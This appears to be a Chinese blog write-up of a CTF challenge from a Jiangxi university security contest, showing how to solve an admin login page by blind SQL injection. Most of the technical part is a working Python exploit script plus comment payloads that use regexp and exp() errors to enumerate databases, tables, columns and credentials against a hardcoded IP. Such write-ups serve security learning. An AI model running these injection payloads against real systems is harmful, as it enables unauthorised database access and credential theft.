wp篇 adminlogin【第四届江西省高校网络安全技能大赛初赛】

最新推荐文章于 2021-11-26 20:55:49 发布
最新推荐文章于 2021-11-26 20:55:49 发布
阅读量2.4k 收藏 2
点赞数 2
分类专栏: wp篇 文章标签: 网络安全 php mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46203060/article/details/120595054
版权

这里写目录标题

一,题目描述

请添加图片描述简而言之,附件中是一条连接,题目访问url/admin.php可以进入下图页面请添加图片描述很明显,这是一道SQL注入。

二,环境复现

环境复现的附件我就放在,资源里面了,大家可以免费下载。(资源审核中)
需要创建一个数据库ddctf(解释一下,我的英文ID是daydream,本人没有冒犯"DDCTF"的意思),然后引用source.sql。
admin.php也经过了测试,waf使用的是非完全版——即不一定完全与比赛当时的waf相同。

三,playload和exp

playload放在exp里面了。

# -*- coding:utf-8 -*-
import requests

url = 'http://1.116.103.114:84/admin/admin.php'
strings = "abcdefghijklmnopqrstuvwxyz1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ_{},-\\{\\}_"
#爆库:user=' or (select if(group_concat(distinct table_schema) regexp '^{}',exp(100000),1) from information_schema.tables)#&pass=mochu7&submit=%E7%99%BB%E5%BD%95
#结果InfORmATIOn_SchEmA,ddcTf,mYSQl,PERfORmAncE_SchEmA,SEcURITY
#爆表:user=' or (select if(group_concat(distinct table_name) regexp '^{}',exp(100000),1) from information_schema.tables where table_schema regexp 'ddctf')#&pass=mochu7&submit=%E7%99%BB%E5%BD%95
#结果:user_flag
#爆列名:user=' or (select if(group_concat(distinct column_name) regexp '^{}',exp(10000),1) from information_schema.columns where table_name regexp 'flag')#&pass=mochu7&submit=%E7%99%BB%E5%BD%95
#结果:id,username,password
#爆字段:user=' or (select if(group_concat(password) regexp '^{}',exp(10000),1) from ddctf.user_flag)#&pass=mochu7&submit=%E7%99%BB%E5%BD%95
#结果:admin,daydream,flag{the_sql_f14g_0f_daydream},874a0300d72a3676c4413ce52454eff7
payload = "user=' or (select if(group_concat(distinct table_name) regexp '^{}',exp(100000),1) from information_schema.tables where table_schema regexp 'ddctf')#&pass=mochu7&submit=%E7%99%BB%E5%BD%95"
res = ''
f = ''
headers = {'Content-Type':'application/x-www-form-urlencoded'}
for i in range(20):#20为字符长度
    for c in strings:
        if res == '':
            pay = payload.format(c)
            print(pay)
            r = requests.post(url=url, data=pay,headers=headers).text
            #print(pay)
        else:
            pay = payload.format(res+c)
            r = requests.post(url=url, data=pay,headers=headers).text
            #print(pay)

        #print(r)
        if 'DOUBLE' in r:#DOUBLE为布尔式返回结果
            res += c
            f += c
            print(f)
            break

四,学习与收获

第一此了解到mysql可以使用正则匹配(好吧,就是我没有系统学习mysql),还学习了group contact的相关语法。把我的学习结果附在下面吧。
在这里插入图片描述在这里插入图片描述

五,个人心得

主要是这篇大佬博客的具体内容写得不是很详细
还有描述不到位的地方,我就不提了,相信大家看上面的总结应该可以很快的理解这道题目的原理。
这里吐槽大佬一下,注入的流程不应该是“爆库”->“爆表”->“爆列名”->“爆字段”吗?

这周末在做梦
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
Admin.Admin/Login --- 后台项目中的管理员及登录模块
weixin_30600197的博客
09-18 5723
Admin.Admin/Login --- 后台项目中的管理员及登录模块 管理员模块: using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.Script.Serializ...
PHP:【商城后台管理系统】admin超级管理员后台登录界面部署
ZzzWClock的博客
10-15 3077
PHP:【商城后台管理系统】admin超级管理员后台登录界面部署 一.后台管理登录非空验证 二.后台管理登录用户信息验证 三.注意事项 需要注意储存用户password的时候需要进行加密 存储password的时候 优先选择password_hash 比 md5 更安全 如果使用md5 加密 请加严处理 HTML 代码块 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /
Django admin登录页面验证码(1):普通字符和算术验证码
anbuqi的博客
10-04 1984
1.前言 django的登录界面默认只有用户名和密码输入框,没有额外的安全防护,如果在生产环境中不加登录验证码直接使用,是非常危险的,因为攻击者可以用特定程序暴力破解的方式进行不断的登录尝试,直至得出正确的登录密码,所以必须加上登录验证码,提高网站攻击成本。 2. 自定义登录页面 首先下载verify.js前端登录验证插件: jquery验证码插件verify.js_jQuery之家-自由分享jQuery、html5、css3的插件库 3.添加验证码数据库 4.覆盖默认登录页面 5
人力资源管理系统之五管理员登录功能-登录和验证码实现
dowell_liu2008的专栏
04-25 1787
登录功能虽然简单,涉及到的知识点还挺多的,主要包括登录功能、登录后注销功能,验证码功能,自动登录功能等,分两节来讲。 界面效果 本系统的界面是在AdminLTE2-itcast的基础进行修改的,源码在码云和github里面都有,码云地址:https://gitee.com/docafe/adminlte2-itcast,gihub地址:https://github.com/itheima2017/...
【开发小技巧】017—如何使用PHP创建管理员登录页面?
web前端开发
06-30 1419
请按照以下步骤使用PHP创建admin登录页面:在这里,我们创建了一个admin登录页面,该登录页面与数据库连接,或者用于登录该页面的信息已经存储在我们的数据库中。1、创建数据库:使用X...
springboot小实操(登陆功能实现)
冲冲冲的博客
09-05 2343
springboot小实操(登陆功能实现)新建数据库和表新建springboot项目application.yml实体类admin建持久层接口与映射文件服务层登录页面新建控制层测试心得 新建数据库和表 这里我使用mysql数据库 //建立数据库 DROP DATABASE IF EXISTS landers; CREATE DATABASE landers DEFAULT CHARACTER SET utf8; //建立表 use landers; CREATE TABLE admin( id INT
第8章 网上招标系统.rar_adminlogin.asp_asp 登陆_configuration system_defau
09-23
源代码\Path.asp 数据库配置文件 源代码\Const.asp 系统常量文件 源代码\default.asp 用户登陆主页面 源代码\AdminLogin.asp 管理员登陆主页面 源代码\IsAdmin.asp 判断用户身份文件 ...
adminlogin.zip
10-03
环境复现的附件我就放在,资源里面了,大家可以免费下载。 需要创建一个数据库ddctf(解释一下,我的英文ID是daydream,本人没有冒犯"DDCTF"的意思),然后引用source.sql。 admin.php也经过了测试,waf使用的是非...
adminlogin的替身.zip
07-06
它们提供了强大的访问控制和权限管理功能,可以实现用户的登录验证、角色分配以及权限控制,确保系统的安全。 在系统设计上,应遵循模块化和分层设计原则,将系统分为表现层(Presentation Layer)、业务逻辑层...
AdminLogin:一个PocketMine-MP插件,用于登录管理员,版主和其他队友
03-21
使用此插件,您可以选择组并为登录到组设置代码,以提高服务器安全性! 我希望这个插件是有用的:) 特征 易于使用(在config.yml设置组和组的代码并启动) 高度可定制的(您可以在messages.yml中更改很多messages.yml...
迅易网络投票评选管理系统V11.1
08-22
运行环境: ASP+ACCESS 2009-04-22 1、修正防SQL注入,加强安全 2、增加多图上传功能,及关联图展示 3、加载自动缩略图功能 ...管理登录 manage/adminlogin.asp 管理帐号 admin 密 码 admin888
Admin管理员登录界面
08-14
Admin管理员管理界面,自己只需做少量修改就可以用了。
根据springboot项目基础整合mybatis
发量旺盛的博客
11-26 644
因为有作业,所以我很“情愿”的就写完了这个项目,只为了学习知识,绝不是为了交作业,绝不是。 首先是导入依赖的问题 需要的依赖:Lombok、Spring Web、Themleaf、MySQL Driver、MyBatis Framework。 实体类中需要用到的注释 @Data:导入getter()、setter()方法 @AllArgsConstructor:导入全参构造 @NoArgsConstructor:导入无参构造 一、图书信息的管理(CRUD) 1.Mapper层(也就是Dao层) impor
/admin/login.php,app/admin/controller/Login.php · 静水流深/wotuoquan - Gitee.com
weixin_35006125的博客
04-08 1284
namespace app\admin\controller;use app\admin\model\User as UserModel;use app\common\controller\Common;use think\Controller;use think\Db;use think\Loader;use think\Request;use think\Url;use think\Sessi...
第四届江西省高校网络安全技能大赛 决赛 MISC
zip471642048的博客
11-10 5201
第四届江西省高校网络安全技能大赛 线下赛MISC 拿到这图片用010editor打开,没看到什么有用的信息,然后用stegsolve打开图片。 在发现是LSB隐写,通道BGR里面有一个rar文件,save bin到本地,发现压缩包损坏。 .RAR文件由于有头部校验,使用伪加密时打开文件会出现报错,使用010Editor修改标志位后如报错消失且正常解压缩,说明是伪加密。使用010Editor打开RAR文件,找到第24个字节,把60改成64 就可以解除报错。 然后这里遇到了一个坑,用stegsolv
iview-admin 简单机制之login
张小年的博客
12-27 1363
行吧,早上上班迟到二十分钟,维护了一通上线的项目就开始倒腾iview-admin了,要用这个写一个简单的后台,本来还以为代码库是之前其他项目的基础轮子,没想到clone下来后发现是原始的不能再原始的框架,花了几个小时后,没有从头搞过的我终于知道这个东西怎么搞,记录一下login机制中包含的小tips: 先看一下主要的src目录 从输入localhost/login开始 1.这时的路由为‘/log...
我想用php实现上述步骤,【开发小技巧】017—如何使用PHP创建管理员登录页面?...
weixin_34512248的博客
03-11 224
请按照以下步骤使用PHP创建admin登录页面:在这里,我们创建了一个admin登录页面,该登录页面与数据库连接,或者用于登录该页面的信息已经存储在我们的数据库中。1、创建数据库:使用XAMPP创建数据库,该数据库在此命名为“ loginpage”。你可以给数据库起任何名字。 2、创建表:在“ loginpage”数据库内创建一个名为“ adminlogin”的表。 3、创建表结构:表“ adm...
vue-element-admin实现login和logout
rfalcon的博客
12-03 4614
【注】本篇文章介绍的是基于花裤衩链接地址的vue-element-admin模板改造的一个前端的后台管理系统解决方案,数据库运用的是(mysql)黑马教程的电商管理系统的.sql文件,操作步骤来自于网络资料和自己不断尝试的合集,感谢参考和建议! 文章目录克隆项目去掉eslint安装依赖启动项目后端编写登录接口修改baseurl编辑.env.development文件修改vue.config.js`npm run dev`重新运行,点击登录查看是否配置生效实现登录找到登录请求找到store中的user.js
export const adminLogin = async (params) =>
最新发布
05-25
这段代码看起来像是使用 ...函数名称为 `adminLogin`,它似乎会执行一些异步操作,因为它使用了 `async` 关键字来标记这是一个异步函数。在函数体内部,可能会存在一些异步操作,比如向服务器发送请求、读取文件等等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

这周末在做梦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值